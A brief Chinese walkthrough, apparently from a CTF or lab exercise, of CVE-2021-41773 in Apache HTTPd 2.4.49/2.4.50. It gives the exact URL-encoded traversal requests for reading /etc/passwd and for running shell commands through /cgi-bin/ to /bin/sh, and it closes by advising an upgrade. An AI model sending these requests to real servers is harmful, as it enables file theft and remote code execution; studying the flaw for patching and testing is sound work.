Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
cgi mode
2.4.49/2.4.50
cgi-bin
和icons
文件夹穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>
。(默认情况下是不允许的:<Directory />Require all denied</Directory>
)
注意:这里的/icons/必须是一个存在且可访问的目录
GET /icons/../../../../etc/passwd HTTP/1.1
失败!对路径..
进行url转码,拼接修改后添加:GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
,成功回显路径,说明存在漏洞。
cgi
或cgid
这两个mod
的情况下,这个路径穿越漏洞将可以执行任意命令,修改请求头:POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
,请求体添加echo; ls /
,成功回显目录。echo;ls /tmp
获取flag升级到最新版的Apache HTTP Server 安全版本。